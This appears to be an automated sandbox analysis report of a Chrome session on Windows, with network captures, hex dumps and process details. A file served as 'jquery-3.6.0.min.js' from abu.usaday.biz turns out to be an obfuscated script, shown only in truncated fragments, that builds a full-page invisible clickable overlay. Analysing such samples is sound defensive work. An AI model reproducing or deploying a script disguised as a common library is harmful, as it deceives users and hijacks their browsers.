                      2023-10-10 03:16:11 UTC2INData Raw: 32 63 39 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 67 75 70 64 61 74 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 75 70 64 61 74 65 32 2f 72 65 73 70 6f 6e 73 65 22 20 70 72 6f 74 6f 63 6f 6c 3d 22 32 2e 30 22 20 73 65 72 76 65 72 3d 22 70 72 6f 64 22 3e 3c 64 61 79 73 74 61 72 74 20 65 6c 61 70 73 65 64 5f 64 61 79 73 3d 22 36 31 32 35 22 20 65 6c 61 70 73 65 64 5f 73 65 63 6f 6e 64 73 3d 22 37 32 39 37 31 22 2f 3e 3c 61 70 70 20 61 70 70 69 64 3d 22 6e 6d 6d 68 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 22 20 63 6f 68 6f 72 74 3d 22 31 3a 3a 22 20 63 6f 68 6f 72 74 6e 61 6d 65 3d 22 22
                      Data Ascii: 2c9<?xml version="1.0" encoding="UTF-8"?><gupdate xmlns="http://www.google.com/update2/response" protocol="2.0" server="prod"><daystart elapsed_days="6125" elapsed_seconds="72971"/><app appid="nmmhkkegccagdldgiimedpiccmgmieda" cohort="1::" cohortname=""
                      2023-10-10 03:16:11 UTC2INData Raw: 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 68 61 73 68 5f 73 68 61 32 35 36 3d 22 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 70 72 6f 74 65 63 74 65 64 3d 22 30 22 20 73 69 7a 65 3d 22 32 34 38 35 33 31 22 20 73 74 61 74 75 73 3d 22 6f 6b 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 2e 30 2e 36 22 2f 3e 3c 2f 61 70 70 3e 3c 2f 67 75 70 64 61 74 65 3e 0d 0a
                      Data Ascii: 723f56b8717175c536685c5450122b30789464ad82" hash_sha256="81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" protected="0" size="248531" status="ok" version="1.0.0.6"/></app></gupdate>
                      2023-10-10 03:16:11 UTC2INData Raw: 30 0d 0a 0d 0a
                      Data Ascii: 0


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      3142.250.217.141443192.168.2.349714C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampkBytes transferredDirectionData
                      2023-10-10 03:16:11 UTC2INHTTP/1.1 200 OK
                      Content-Type: application/json; charset=utf-8
                      Access-Control-Allow-Origin: https://www.google.com
                      Access-Control-Allow-Credentials: true
                      X-Content-Type-Options: nosniff
                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                      Pragma: no-cache
                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                      Date: Tue, 10 Oct 2023 03:16:11 GMT
                      Strict-Transport-Security: max-age=31536000; includeSubDomains
                      Cross-Origin-Opener-Policy: same-origin
                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/IdentityListAccountsHttp/cspreport
                      Content-Security-Policy: script-src 'report-sample' 'nonce-5811Pc6XbKz9m6VRvcfBcw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/IdentityListAccountsHttp/cspreport;worker-src 'self'
                      Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/IdentityListAccountsHttp/cspreport/allowlist
                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                      Server: ESF
                      X-XSS-Protection: 0
                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                      Accept-Ranges: none
                      Vary: Accept-Encoding
                      Connection: close
                      Transfer-Encoding: chunked
                      2023-10-10 03:16:11 UTC4INData Raw: 31 31 0d 0a 5b 22 67 61 69 61 2e 6c 2e 61 2e 72 22 2c 5b 5d 5d 0d 0a
                      Data Ascii: 11["gaia.l.a.r",[]]
                      2023-10-10 03:16:11 UTC4INData Raw: 30 0d 0a 0d 0a
                      Data Ascii: 0


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      4192.168.2.349715172.67.148.211443C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampkBytes transferredDirectionData
                      2023-10-10 03:16:13 UTC4OUTGET /jquery-3.6.0.min.js HTTP/1.1
                      Host: abu.usaday.biz
                      Connection: keep-alive
                      Upgrade-Insecure-Requests: 1
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Sec-Fetch-Site: none
                      Sec-Fetch-Mode: navigate
                      Sec-Fetch-User: ?1
                      Sec-Fetch-Dest: document
                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                      sec-ch-ua-mobile: ?0
                      sec-ch-ua-platform: "Windows"
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      5172.67.148.211443192.168.2.349715C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampkBytes transferredDirectionData
                      2023-10-10 03:16:13 UTC5INHTTP/1.1 200 OK
                      Date: Tue, 10 Oct 2023 03:16:13 GMT
                      Content-Type: application/javascript
                      Content-Length: 2790
                      Connection: close
                      Last-Modified: Tue, 01 Jun 2021 06:00:40 GMT
                      ETag: "60b5cd08-ae6"
                      Expires: Tue, 10 Oct 2023 08:01:04 GMT
                      Cache-Control: max-age=43200
                      CF-Cache-Status: HIT
                      Age: 26109
                      Accept-Ranges: bytes
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=v%2BlhAe5eiQ63xT6kO7D5MYFK%2BClGD%2BBmVQb3SqBYmMUQp%2F1Nro%2BDO0LNcn0fzYjClvEWCoJyz3QV2hQRFPUhjCHRnZS9Iv10CdCobcDG7ymZP%2FyfSkI5RbOvRz06mOEQ1w%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 813bb40efeb2dbc2-LAX
                      alt-svc: h3=":443"; ma=86400
                      2023-10-10 03:16:13 UTC5INData Raw: 76 61 72 20 5f 30 78 35 63 37 31 3d 5b 22 5c 78 36 33 5c 78 33 38 5c 78 33 32 5c 78 33 32 5c 78 36 33 5c 78 33 31 5c 78 36 32 5c 78 33 36 5c 78 33 33 5c 78 33 38 5c 78 33 35 5c 78 33 33 5c 78 36 35 5c 78 36 34 5c 78 33 32 5c 78 33 37 5c 78 33 33 5c 78 36 32 5c 78 33 38 5c 78 33 39 5c 78 33 36 5c 78 33 38 5c 78 33 37 5c 78 36 31 5c 78 36 33 5c 78 33 35 5c 78 33 30 5c 78 33 35 5c 78 36 36 5c 78 33 39 5c 78 36 36 5c 78 36 31 22 2c 22 5c 78 33 37 5c 78 33 33 5c 78 33 38 5c 78 36 31 5c 78 36 31 5c 78 33 38 5c 78 36 34 5c 78 33 33 5c 78 36 32 5c 78 36 33 5c 78 33 30 5c 78 33 32 5c 78 36 35 5c 78 36 32 5c 78 33 38 5c 78 33 37 5c 78 33 31 5c 78 33 32 5c 78 36 31 5c 78 36 33 5c 78 36 34 5c 78 33 30 5c 78 36 35 5c 78 36 32 5c 78 33 32 5c 78 36 33 5c 78 36 36 5c 78
                      Data Ascii: var _0x5c71=["\x63\x38\x32\x32\x63\x31\x62\x36\x33\x38\x35\x33\x65\x64\x32\x37\x33\x62\x38\x39\x36\x38\x37\x61\x63\x35\x30\x35\x66\x39\x66\x61","\x37\x33\x38\x61\x61\x38\x64\x33\x62\x63\x30\x32\x65\x62\x38\x37\x31\x32\x61\x63\x64\x30\x65\x62\x32\x63\x66\x
                      2023-10-10 03:16:13 UTC6INData Raw: 22 2c 22 5c 78 36 33 5c 78 37 32 5c 78 36 35 5c 78 36 31 5c 78 37 34 5c 78 36 35 5c 78 34 35 5c 78 36 43 5c 78 36 35 5c 78 36 44 5c 78 36 35 5c 78 36 45 5c 78 37 34 22 2c 22 5c 78 36 39 5c 78 36 34 22 2c 22 5c 78 36 33 5c 78 37 33 5c 78 37 33 5c 78 35 34 5c 78 36 35 5c 78 37 38 5c 78 37 34 22 2c 22 5c 78 37 33 5c 78 37 34 5c 78 37 39 5c 78 36 43 5c 78 36 35 22 2c 22 5c 78 37 37 5c 78 36 39 5c 78 36 34 5c 78 37 34 5c 78 36 38 5c 78 33 41 5c 78 33 31 5c 78 33 30 5c 78 33 30 5c 78 32 35 5c 78 33 42 5c 78 32 30 5c 78 36 38 5c 78 36 35 5c 78 36 39 5c 78 36 37 5c 78 36 38 5c 78 37 34 5c 78 33 41 5c 78 33 31 5c 78 33 30 5c 78 33 30 5c 78 32 35 5c 78 33 42 5c 78 32 30 5c 78 37 30 5c 78 36 46 5c 78 37 33 5c 78 36 39 5c 78 37 34 5c 78 36 39 5c 78 36 46 5c 78 36 45
                      Data Ascii: ","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x69\x64","\x63\x73\x73\x54\x65\x78\x74","\x73\x74\x79\x6C\x65","\x77\x69\x64\x74\x68\x3A\x31\x30\x30\x25\x3B\x20\x68\x65\x69\x67\x68\x74\x3A\x31\x30\x30\x25\x3B\x20\x70\x6F\x73\x69\x74\x69\x6F\x6E
                      2023-10-10 03:16:13 UTC7INData Raw: 78 33 41 5c 78 32 30 5c 78 33 31 5c 78 33 30 5c 78 33 30 5c 78 32 35 5c 78 33 42 5c 78 32 30 5c 78 36 33 5c 78 37 35 5c 78 37 32 5c 78 37 33 5c 78 36 46 5c 78 37 32 5c 78 33 41 5c 78 32 30 5c 78 36 34 5c 78 36 35 5c 78 36 36 5c 78 36 31 5c 78 37 35 5c 78 36 43 5c 78 37 34 5c 78 32 32 5c 78 33 45 5c 78 33 43 5c 78 32 46 5c 78 36 31 5c 78 33 45 22 2c 22 5c 78 36 46 5c 78 36 45 5c 78 36 33 5c 78 36 43 5c 78 36 39 5c 78 36 33 5c 78 36 42 22 2c 22 5c 78 36 34 5c 78 36 39 5c 78 37 33 5c 78 37 30 5c 78 36 43 5c 78 36 31 5c 78 37 39 22 2c 22 5c 78 36 45 5c 78 36 46 5c 78 36 45 5c 78 36 35 22 2c 22 5c 78 36 31 5c 78 37 30 5c 78 37 30 5c 78 36 35 5c 78 36 45 5c 78 36 34 5c 78 34 33 5c 78 36 38 5c 78 36 39 5c 78 36 43 5c 78 36 34 22 2c 22 5c 78 36 32 5c 78 36 46 5c
                      Data Ascii: x3A\x20\x31\x30\x30\x25\x3B\x20\x63\x75\x72\x73\x6F\x72\x3A\x20\x64\x65\x66\x61\x75\x6C\x74\x22\x3E\x3C\x2F\x61\x3E","\x6F\x6E\x63\x6C\x69\x63\x6B","\x64\x69\x73\x70\x6C\x61\x79","\x6E\x6F\x6E\x65","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      6192.168.2.349717172.67.148.211443C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampkBytes transferredDirectionData
                      2023-10-10 03:16:13 UTC8OUTGET /favicon.ico HTTP/1.1
                      Host: abu.usaday.biz
                      Connection: keep-alive
                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                      sec-ch-ua-mobile: ?0
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      sec-ch-ua-platform: "Windows"
                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                      Sec-Fetch-Site: same-origin
                      Sec-Fetch-Mode: no-cors
                      Sec-Fetch-Dest: image
                      Referer: https://abu.usaday.biz/jquery-3.6.0.min.js
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      7172.67.148.211443192.168.2.349717C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampkBytes transferredDirectionData
                      2023-10-10 03:16:14 UTC9INHTTP/1.1 404 Not Found
                      Date: Tue, 10 Oct 2023 03:16:14 GMT
                      Content-Type: text/html
                      Transfer-Encoding: chunked
                      Connection: close
                      Cache-Control: max-age=14400
                      CF-Cache-Status: MISS
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=u9mxTix3ZJeEJl1m3ga2mkiabeNsZGF4WOpN8lPQs64Iu3E%2BSd%2BCKY9%2FChjT5hZ8PNITU8eUe2meCLRVub3mm%2BWJxmVUkgsGuKltOtOpbj9tUQdvM2x4uKtaOCrzYJRXwg%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 813bb413ec3c7c83-LAX
                      alt-svc: h3=":443"; ma=86400
                      2023-10-10 03:16:14 UTC9INData Raw: 32 34 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 33 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20
                      Data Ascii: 244<html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.10.3 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->...
                      2023-10-10 03:16:14 UTC10INData Raw: 30 0d 0a 0d 0a
                      Data Ascii: 0


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      8192.168.2.34971835.190.80.1443C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampkBytes transferredDirectionData
                      2023-10-10 03:16:15 UTC10OUTOPTIONS /report/v3?s=u9mxTix3ZJeEJl1m3ga2mkiabeNsZGF4WOpN8lPQs64Iu3E%2BSd%2BCKY9%2FChjT5hZ8PNITU8eUe2meCLRVub3mm%2BWJxmVUkgsGuKltOtOpbj9tUQdvM2x4uKtaOCrzYJRXwg%3D%3D HTTP/1.1
                      Host: a.nel.cloudflare.com
                      Connection: keep-alive
                      Origin: https://abu.usaday.biz
                      Access-Control-Request-Method: POST
                      Access-Control-Request-Headers: content-type
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      935.190.80.1443192.168.2.349718C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampkBytes transferredDirectionData
                      2023-10-10 03:16:15 UTC10INHTTP/1.1 200 OK
                      Content-Length: 0
                      access-control-max-age: 86400
                      access-control-allow-methods: POST, OPTIONS
                      access-control-allow-origin: *
                      access-control-allow-headers: content-type, content-length
                      date: Tue, 10 Oct 2023 03:16:14 GMT
                      Via: 1.1 google
                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                      Connection: close


                      020406080s020406080100

                      Click to jump to process

                      020406080s0.0050100MB

                      Click to jump to process

                      Target ID:0
                      Start time:05:16:08
                      Start date:10/10/2023
                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
                      Imagebase:0x7ff7c89f0000
                      File size:3'242'272 bytes
                      MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:false

                      Target ID:3
                      Start time:05:16:09
                      Start date:10/10/2023
                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=2040,i,1388585368886845847,6482679812835657815,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                      Imagebase:0x7ff7c89f0000
                      File size:3'242'272 bytes
                      MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:false

                      Target ID:8
                      Start time:05:16:11
                      Start date:10/10/2023
                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Program Files\Google\Chrome\Application\chrome.exe" "http://abu.usaday.biz/jquery-3.6.0.min.js
                      Imagebase:0x7ff7c89f0000
                      File size:3'242'272 bytes
                      MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true
                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                      No disassembly